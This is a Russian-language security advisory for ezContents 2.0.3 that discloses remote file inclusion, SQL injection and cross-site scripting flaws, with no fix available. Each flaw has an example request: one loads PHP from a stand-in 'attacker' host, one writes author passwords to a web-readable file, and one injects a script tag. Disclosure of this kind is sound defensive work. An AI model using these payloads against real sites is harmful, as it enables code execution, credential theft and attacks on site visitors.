Дата публикации: | 04.09.2006 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 3004 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2006-4477 CVE-2006-4478 CVE-2006-4479 CVE-2008-2135 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | ezContents 2.x |
Уязвимые версии: ezContents 2.0.3, возможно другие версии.
Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в функции "moduleExternalLink()" в сценарии modules/moduleSec.php. Удаленный пользователь может просмотреть произвольные файлы или выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:
http://host/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://attacker/file.php Уязвимость существует также в функции "isExternalLink()" в сценарии include/functions.php и в функции "adminExternalLink()" в сценарии admin/adminbutton.php. 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "groupname" сценария headeruserdata.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример: http://[host]/headeruserdata.php?groupname=' UNION SELECT userpassword FROM authors INTO OUTFILE '/www/passwd.txt' # 3. Уязвимость существует из-за недостаточной обработки входных данных в параметре "subgroupname" сценария loginreg2.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: http://[host]/loginreq2.php?subgroupname="><script>alert(666)</script> URL производителя: www.ezcontents.org Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: | ezContents Version 2.0.3 Remote/Local File Inclusion, SQL Injection, XSS |